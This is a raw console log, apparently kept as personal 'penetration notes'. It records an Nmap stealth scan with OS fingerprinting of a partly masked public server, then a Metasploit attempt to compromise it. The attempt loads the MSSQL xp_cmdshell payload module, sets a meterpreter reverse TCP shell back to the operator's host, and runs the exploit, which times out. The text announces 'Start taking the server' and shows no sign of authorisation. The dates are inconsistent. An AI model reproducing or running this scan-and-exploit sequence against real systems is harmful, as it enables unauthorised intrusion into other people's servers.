Starting Nmap 5.30BETA1 (http://nmap.org) at 2011-05-06 09:36 China Standard Time
NSE: Loaded scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (+ total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE       VERSION
21/tcp   open   ftp           Microsoft ftpd
25/tcp   closed smtp
80/tcp   open   http          Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code)
|_html-title: Site doesn't have a title (text/html).
110/tcp  closed pop3
3306/tcp open   mysql         MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: <*[k+0o~o; By^j5k<*[k+0o~o
3389/tcp open   microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 Digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   50.00 ms 203.171.239.*

Read data files from: d:\metasploit\nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
           Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

Start taking the server.

Welcome to the Metasploit Web Console!

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ payloads - 27 encoders - 8 nops
       =[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.
         We recommend the framework at least every.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload

       Name: Microsoft SQL Server Payload Execution
    Version: 9669
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  David Kennedy "ReL1K" <kennedyd013@gmail.com>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PASSWORD                       no        The password for the specified username
  RHOST                          yes       The target address
  RPORT         1433             yes       The target port
  USERNAME      sa               no        The username to authenticate as
  UseCmdStager  true             no        Wait for user input before returning from exploit
  VERBOSE       false            no        Enable verbose output

Payload information:

Description:
  This module will execute an arbitrary payload on a Microsoft SQL
  Server, using the Windows debug.com method for writing an executable
  to disk and the xp_cmdshell stored procedure. File size restrictions
  are avoided by incorporating the debug bypass method presented at
  Defcon by SecureState. Note that this module will leave a Metasploit
  payload in the Windows System32 directory which must be manually
  deleted once the attack is completed.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
  http://www.osvdb.org/557
  http://www.securityfocus.com/bid/1281
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
  http://www.osvdb.org/15757
  http://www.securityfocus.com/bid/4797
  http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options

Module options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PASSWORD                       no        The password for the specified username
  RHOST                          yes       The target address
  RPORT         1433             yes       The target port
  USERNAME      sa               no        The username to authenticate as
  UseCmdStager  true             no        Wait for user input before returning from exploit
  VERBOSE       false            no        Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process
  LHOST                      yes       The listen address
  LPORT     4444             yes       The listen port

Exploit target:
  Id  Name
  --  ----
  0   Automatic

>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.
Penetration notes -2013-07-13 windows/mssql/mssql_payload